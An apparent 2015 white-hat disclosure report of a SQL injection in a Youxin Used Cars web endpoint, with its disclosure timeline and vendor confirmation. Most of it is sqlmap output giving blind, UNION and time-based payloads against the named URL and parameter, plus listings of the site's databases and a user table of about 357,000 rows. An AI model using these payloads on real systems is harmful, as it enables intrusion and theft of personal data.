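2015-10-27: Details reported to the vendor; awaiting vendor handling
2015-10-27: Vendor has confirmed; details disclosed only to the vendor
2015-11-06: Details disclosed to core white hats and experts in related fields
2015-11-16: Details disclosed to regular white hats
2015-11-26: Details disclosed to intern white hats
2015-12-11: Details disclosed to the public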
Youxin Used Cars (优信二手车): SQL injection vulnerability on one of its sites, #2 (can leak information on 340,000 users)
http://huodong.xin.com:8888/ajax/top_load/
data: ename=nanjing
Place: POST
Parameter: ename
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ename=nanjing') AND 4097=4097 AND ('EZvb'='EZvb

    Type: UNION query
    Title: MySQL UNION query (NULL) - 9 columns
    Payload: ename=-4045') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7175797071,0x534472585447486b5965,0x7173636c71),NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: ename=nanjing') AND SLEEP(5) AND ('VCSh'='VCSh
---
[23:52:58] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.14
back-end DBMS: MySQL 5.0.11
[23:52:58] [INFO] fetching database names
[23:52:58] [INFO] the SQL query used returns 4 entries
[23:52:59] [INFO] retrieved: "information_schema"
[23:52:59] [INFO] retrieved: "car_model_partner"
[23:52:59] [INFO] retrieved: "test"
[23:52:59] [INFO] retrieved: "xin"
available databases [4]:
[*] car_model_partner
[*] information_schema
[*] test
[*] xin
Place: POST
Parameter: ename
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ename=nanjing') AND 4097=4097 AND ('EZvb'='EZvb

    Type: UNION query
    Title: MySQL UNION query (NULL) - 9 columns
    Payload: ename=-4045') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7175797071,0x534472585447486b5965,0x7173636c71),NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: ename=nanjing') AND SLEEP(5) AND ('VCSh'='VCSh
---
[23:56:25] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.42
back-end DBMS: MySQL 5.0.11
Database: xin
+--------+---------+
| Table  | Entries |
+--------+---------+
| `user` | 357683  |
+--------+---------+
Severity: High
Vulnerability Rank: 10
Confirmation time: 2015-10-27 16:12
Thank you for the feedback! We are assisting with the fix.
None yet